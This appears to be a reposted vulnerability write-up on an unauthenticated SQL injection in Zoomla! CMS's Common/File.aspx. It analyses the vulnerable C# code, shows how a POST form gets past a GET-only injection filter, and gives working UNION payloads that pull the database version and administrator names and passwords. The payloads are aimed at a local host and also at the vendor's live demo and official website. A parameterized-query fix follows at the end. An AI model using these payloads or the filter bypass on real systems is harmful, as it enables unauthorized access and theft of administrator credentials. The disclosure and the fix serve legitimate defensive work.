Zoomla! CMS SQL injection affects the entire CMS2 series and CMS6.0 versions, and also the official website (no login required)

Source: Internet
Author: User


Affected Versions
Zoomla! CMS2_x1.5
Zoomla! CMS2_x2.0
Zoomla! CMS2_x2.1
Zoomla! CMS2_x2.2
Zoomla! CMS2_x2.3
Zoomla! CMS2_x2.4
Zoomla! CMS6.0
Other versions (not tested)

The detailed analysis is as follows:

Problem file: \Common\File.aspx

Note: the problem file contains two injection points.

Parameter: code



The code analysis is as follows (the injection points are marked in comments):

```csharp
protected void Page_Load(object sender, EventArgs e)
{
    string str = "http://" + HttpContext.Current.Request.Url.Authority.ToString() + "/UploadFiles/" + this.ull.GetLogin(true).UserName;
    if (base.Request.QueryString["code"] == null && base.Request.QueryString["FD"] != null)
    {
        if (base.Request.QueryString["ur"] == null && base.Request.QueryString["state"] == null)
        {
            string value = base.Server.UrlDecode(base.Request.QueryString["FD"]);
            this.fileUrl = this.FileJiema(value);
            this.hid.Value = base.Server.UrlDecode(base.Request.QueryString["FD"]);
        }
        else
        {
            if (base.Request.QueryString["state"] == null)
            {
                string value2 = base.Request.QueryString["FD"].ToString().Replace(" ", "+");
                this.fileUrl = this.FileJiema(value2);
                this.hid.Value = value2;
            }
        }
        if (base.Request["state"] != null && base.Request["state"] == "tr")
        {
            string value3 = base.Request.QueryString["FD"];  /* first injection: a Base64 string carrying SQL */
            this.fileUrl = this.FileJiema(value3);          /* first injection: decoded with FromBase64String(value) */
            this.hid.Value = value3;
            this.file = this.bfile.SelectFile(string.Concat(new object[] { "FileName='", this.fileUrl, "' and userid=", this.ull.GetLogin(true).UserID }));
            /* first injection: this.bfile.SelectFile pastes the condition straight into the SQL text */
            if (this.file.DownUrl == null)
            {
                base.Response.Write("0");
                base.Response.End();
                return;
            }
            base.Response.Write("http://" + HttpContext.Current.Request.Url.Authority.ToString() + "/Common/File.aspx?code=" + this.file.ExtractionCode);
            base.Response.End();
            return;
        }
        else
        {
            if (base.Request.QueryString["ur"] != null)
            {
                this.file.ExtractionCode = Function.GetRandomString(8, 1);
                this.file.DownUrl = str + this.fileUrl;
                this.file.State = 1;
                this.file.UserID = this.ull.GetLogin(true).UserID;
                this.file.FileName = this.fileUrl;
                this.bfile.AddFile(this.file);
                base.Response.Write("http://" + HttpContext.Current.Request.Url.Authority.ToString() + "/Common/File.aspx?code=" + this.file.ExtractionCode);
                base.Response.End();
                return;
            }
        }
    }
    else
    {
        /* second injection: the code parameter */
        if (base.Request.QueryString["code"] != "" && base.Request.QueryString["code"] != null)
        {
            this.file = this.bfile.SelectFile("ExtractionCode='" + base.Request.QueryString["code"] + "'");
            base.Response.Redirect(this.file.DownUrl);  /* the redirect URL cannot contain line breaks, so the payloads below use SUBSTRING (interception) and STUFF (splicing) */
        }
    }
}
```

The code of the this.bfile.SelectFile method is as follows:

```csharp
public M_File SelectFile(string where)
{
    if (where == "")
    {
        this.SQL = "select * from ZL_File";
    }
    else
    {
        this.SQL = "select * from ZL_File where " + where;  /* the condition is concatenated directly into the SQL: injection */
    }
    ...
}
```





We can construct the following URL:

Local: http://192.168.1.100:8087/Common/File.aspx?code='

However, at this point the request is blocked by the SQL anti-injection filter.

Let's look at the interception code in Global.asax:

```csharp
private void Application_BeginRequest(object sender, EventArgs e)
{
    if (base.Request.RequestType.ToUpper() == "GET" && ZoomlaSecurityCenter.GetData())
    {
        Function.WriteMessage("Possible cause: the parameters you submitted are incorrect, contain malicious strings, or check whether the system has enabled the SQL anti-injection function!", "", "Illegal SQL injection or storage!");
    }
    if (base.Request.HttpMethod.ToUpper() == "POST" && HttpContext.Current.Request.Files.Count > 0)  /* only the GET branch checks parameters, so the POST submission method can be used to bypass it */
    {
        ZoomlaSecurityCenter.CheckUpladFiles();
    }
}
```



Based on the above analysis, I used the following method to bypass the filter and inject.

The code for creating the form is as follows:

```html
<form id="form1" action="" method="post"><input type="submit" value="CMS injection" /></form>
```



Enter the following URL as the form's action.

1. Construct a local injection URL

1.1 Database version

Note: after the injection, the redirect address in base.Response.Redirect(this.file.DownUrl) cannot contain line breaks. Therefore the interception method (SUBSTRING) and the splicing method (STUFF) are used here.

http://192.168.1.100:8087/Common/File.aspx?code=' union select null,1,SUBSTRING(@@VERSION,0,30),null,null,1,null --



1.2 Obtain the administrator

http://192.168.1.100:8087/Common/File.aspx?code=' union select null,1,STUFF(AdminPassword,1,0,AdminName),null,null,1,null from ZL_Manager --



2. Official demo

2.1 Database version

http://demo.zoomla.cn/Common/File.aspx?code=' union select null,1,SUBSTRING(@@VERSION,0,30),null,null,1,null --



2.2 Obtain the administrator

http://demo.zoomla.cn/Common/File.aspx?code=' union select null,1,STUFF(AdminPassword,1,0,AdminName),null,null,1,null from ZL_Manager --

3. Official website

3.1 Database version

http://www.zoomla.cn/Common/File.aspx?code=' union select null,1,SUBSTRING(@@VERSION,0,30),null,null,1,null --



3.2 Obtain the administrator

http://www.zoomla.cn/Common/File.aspx?code=' union select null,1,STUFF(AdminPassword,1,0,AdminName),null,null,1,null from ZL_Manager --

Solution:

Filter the code and FD parameters before they reach SelectFile, for POST requests as well as GET.
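As an added example (not Zoomla! code), here is the hardened counterpart of SelectFile for the code path: the value is bound as a SqlParameter instead of being concatenated into the WHERE clause, and the caller rejects anything that is not an 8-character code before querying. The column list, the M_File fields, the connection string and the letters-and-digits rule are assumptions; the same parameter binding applies to the FileName/userid query behind the first injection.

```csharp
using System.Data;
using System.Data.SqlClient;

// Model with the fields the page's Page_Load reads from M_File (assumed shape).
public class M_File
{
    public string FileName { get; set; }
    public string DownUrl { get; set; }
    public string ExtractionCode { get; set; }
    public int UserID { get; set; }
}

public static class FileRepository
{
    // Replaces SelectFile("ExtractionCode='" + code + "'"). The value is bound
    // as a typed parameter, so a quote or "union select" in it is compared as
    // data and never parsed as SQL; that holds for POST as well as GET, unlike
    // the Application_BeginRequest filter, which only inspects GET requests.
    public static M_File SelectFileByExtractionCode(string connectionString, string code)
    {
        // Codes are issued by Function.GetRandomString(8, 1): the length comes
        // from the page, the letters-and-digits rule is an assumption.
        if (string.IsNullOrEmpty(code) || code.Length != 8) return null;
        foreach (char c in code)
            if (!char.IsLetterOrDigit(c)) return null;

        const string sql = "SELECT TOP 1 FileName, DownUrl, ExtractionCode, UserID "
                         + "FROM ZL_File WHERE ExtractionCode = @code";
        using (var conn = new SqlConnection(connectionString))
        using (var cmd = new SqlCommand(sql, conn))
        {
            cmd.Parameters.Add("@code", SqlDbType.NVarChar, 8).Value = code;
            conn.Open();
            using (SqlDataReader r = cmd.ExecuteReader())
            {
                if (!r.Read()) return null;   // unknown code: nothing to redirect to
                return new M_File
                {
                    FileName = r.GetString(0),
                    DownUrl = r.IsDBNull(1) ? null : r.GetString(1),
                    ExtractionCode = r.GetString(2),
                    UserID = r.GetInt32(3)
                };
            }
        }
    }
}
```

The caller should still test DownUrl for null before calling Response.Redirect, as Page_Load does on the FD path but not on the code path.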
